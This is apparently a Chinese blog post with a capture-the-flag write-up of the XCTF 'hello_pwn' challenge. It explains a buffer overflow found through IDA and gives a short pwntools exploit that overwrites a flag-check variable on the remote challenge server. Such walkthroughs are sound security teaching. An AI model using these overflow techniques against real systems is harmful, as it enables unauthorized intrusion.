XCTF hello_pwn

最新推荐文章于 2024-01-14 21:41:44 发布
最新推荐文章于 2024-01-14 21:41:44 发布
阅读量271 收藏
点赞数
分类专栏: PWN
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/prettyX/article/details/117715788
版权

先使用file查看

checksec

IDA F5

这里第一行的alarm()函数的作用,请参考该文章,这位博主写的很详细

再来看下read()函数第2个参数 unk_601068

发现和 dword_60106C是相邻的

再来看下if语句里的

所以,逻辑出来了,通过read()函数覆盖dword_60106C的值,使其等于 'nuaa',即可获得flag

注意:这里是小端,要写成'aaun'

Exp

from pwn import*

p=remote('111.200.241.244',58893)
#p=process("./4f2f44c9471d4dc2b59768779e378282")
payload='a'*4+'aaun'
p.recvuntil("lets get helloworld for bof\n")
p.sendline(payload)
p.interactive()

 

prettyX
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
XCTF-PWN新手区通关手册
万丈⾼楼平地起,勿在浮沙筑⾼台学艺不精的安全菜鸡,改行回家养猪了,对博客有疑问欢迎留言,看到一定回
03-06 458
XCTF-PWN新手区通关手册 题目下载地址:点此下载 1.cgpwn2 import struct import socket def p32(value): return struct.pack("<I",value) tcp = socket.socket(socket.AF_INET,socket.SOCK_STREAM) tcp.connect(("111.198.29.45...
hello_pwn(xctf)
weixin_43868725的博客
05-06 616
0x0 程序保护和流程 保护: 流程: subsub_400686(): 当dword_60106C = 1853186401 时进入subsub_400686()函数获得flag。 0x1 利用 仔细分析后可以发现 两个数据是相邻的,我们可以通过read函数改写dword_60106C的值从而获得flag。unk_601068和dword_60106C 只相差四个字节,read函数可以输...
day-6 xctf-hello_pwn
a525024162806525的博客
09-26 381
xctf-hello_pwn 题目传送门:https://adworld.xctf.org.cn/task/answer?type=pwn&number=2&grade=0&id=5052 又是一个溢出,和昨天的有异曲同工之处: 差4个字节,溢出改变dword_60106C的值为nuaa(注意:这里为小端存储,要写为'aa...
XCTF hello_pwn题目
weixin_45643931的博客
11-14 2406
第一个题目通过EXP脚本连接上就出现了flag,懒得写WP 这个题目是XCTF的第二个题,也是我接触的第一个正式的pwn题目 直接下载附件 之后用IDA打开 打开以后,也不是很确定干啥,就直接ALT+T (搜索) 搜索CTF,flag之类的 之后就搜到了CTF的一句话 双击进去 然后按下F5 查看伪代码 而这里的if语句告诉了我们很多信息,如果XXX,就OOO双击函数进去 分析一下,应该是当…6C = 1853186401 时进入…0686()函数获得flag。 而这两个数据相差4个字节,更方便通过
XCTFhello_pwn[WriteUP]
最新发布
如有错误感谢斧正
01-14 481
发现read函数中的unk_601068正好在dword_60106C的后第4个字节。使stack栈溢出,字节数正好到dword_60106C的位置。解题方法很明显了,往read函数里扔4个字节的数据。双击sub_400686函数,查看具体执行动作。计算一下字节长度也是一样的算出来四个字节。这个函数的作用就是运行系统命令 cat。再按F5,对main函数进行反汇编。查看当前目录的flag.txt内容。双击左侧的函数栏中的main函数。把IP地址和端口号,换成题目给的。直接就输出了flag。
XCTF_A_物料清单标准功能培训.pptx
10-11
XCTF_A_物料清单标准功能培训.pptx
XCTF_A_应收管理标准功能培训.pptx
10-11
XCTF_A_应收管理标准功能培训.pptx
XCTF_A_应付管理标准功能培训.pptx
10-11
XCTF_A_应付管理标准功能培训.pptx
XCTF_A_成本管理标准功能培训.pptx
09-25
XCTF_A_成本管理标准功能培训.pptx
xctf_huaweicloud-qualifier-2020
05-31
xctf_huaweicloud-qualifier-2020写上去译文原始码类别名称网址分数解决了PWN cp 游戏 快速执行 Fastga mysqli 迷你人 nday_container_escape qemu-zzz 网络隐藏云我的1 我的2 派尔 网壳 :cross_mark: 杂项以太网 谁...
hello_pwn [XCTF-PWN]CTF writeup系列4
重新启程
12-19 629
题目:hello_pwn 先看下题目 照例,检查一下保护情况,反编译程序 root@mypwn:/ctf/work/python# checksec c0a6dfb32cc7488a939d8c537530174d [*] '/ctf/work/python/c0a6dfb32cc7488a939d8c537530174d' Arch: amd64-64-little...
XCTF|PWN-hello_pwn-WP
l2645470582_的博客
07-30 309
1、下载文件并开启靶机 2、用Linux查看该文件信息 checksec 2 3、该文件是64位的文件,用64位IDA打开该文件 3.1、shift+f12查看该文件关键字符串 3.2、双击关键字符串,再按ctrl+x查看"cat flag.txt"的地址 "cat flag.txt"地址:0x400686 3.3、按f5进入main函数 两个函数相差4个字节 4、编译代码 #encodi...
hello pwn
Fiverya的博客
03-08 452
首先打开IDA,拖入程序 可以看到一个很简单的程序。 getshell函数如下: getshell 函数地址: 在hello函数处下断点: 调试到read处,确定溢出点。 payload如下: ...
XCTF Hello CTF
YenKoc的博客
01-15 1013
一.查壳 二.拖入ida x86静态分析 shift +F12找到字符串。 发现关键字please input your serial 点击进入 这是我们的主函数,F5反编译一下,看一下逻辑。 这里有几个函数,我也不懂啥意思,百度的. 1.qmemcpy(void *destin ,void *source):将source指针所指的值拷贝到destin中去 2.sprintf(char ...
攻防世界--hello_pwn
Hk_Mayfly的博客
01-13 292
测试文件:https://adworld.xctf.org.cn/media/task/attachments/c0a6dfb32cc7488a939d8c537530174d checksec转自:https://www.cnblogs.com/Ox9A82/p/5728149.html (1)拿到efl,首先要用checksec来检测elf运行于哪个平台,开启了什么安全措施,如果...
攻防世界XCTF新手区pwn
weixin_45948183的博客
03-24 673
0x00get_shell 第一个比较简单,直接看IDA里面的源码,da进入main函数查看,有system和bin/sh 直接nc连接就可以拿到flag 0x01CGfsb 先看一下保护机制 IDA里面看一下 可以看出当pwnme=8,就可以拿到flag,然后怎么使pwnme=8呢? 可以看出printf哪里存在格式化字符漏洞,由于printf()函数使用不当,造成任意内存读写,通常使用%...
xctf攻防世界pwn基础题解(新手食用)
热门推荐
Spwpun的博客
05-01 2万+
文章目录CGFsb status:updating… CGFsb 前面的那一道get_shell的题算是做pwn题的一般流程:下载文件,ida查看代码,分析漏洞,利用漏洞写出exp,最常用的是用到python的pwntools,然后使用nc或者pwntools连接到虚拟场景实现漏洞攻击得到flag。 本题的思路基本一致,使用pwntools编写漏洞利用脚本,这里的漏洞是格式化字符串漏洞,文章分...
xctf pwn 新手练习题总结
neuisf的博客
01-21 793
所谓总结,就是再做一遍!以达到熟能生巧之境界! 0x01 level0 解题思路: ret2text 1.checksec ,文件为amd64位格式,进开启可NX; 2.IDA Pro F5反编译,main程序调用vulnerable_function,vulnerable_function中调用read读取用户输入,存在缓冲区溢出; 3.程序代码中由callsystem函数,运行systerm...
nuaactf hello_pwn writeup
ditto的博客
12-22 1067
拿到题目 检查下有什么防护: 直接放到IDA里: 代码很短 数组unk_601068和变量dword_60106C都在.bss段里: sub40686()这个函数是读取flag: 这里说下read函数,第一个参数为0,代表标准输入即从终端输入,第三个参数是输入的个数是0x10,即16个字节。 想要读取flag只需变量dword_60106C的值为0x6E756161即可,那就很明显了,只需...
pure_color xctf
07-16
pure_color xctf是一个CTF比赛平台,致力于举办和推广网络安全竞赛。 pure_color xctf的目标是为安全爱好者和专业人士提供一个学习、切磋和交流的平台。这个平台上举办的比赛覆盖了各种网络安全领域,包括但不限于...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值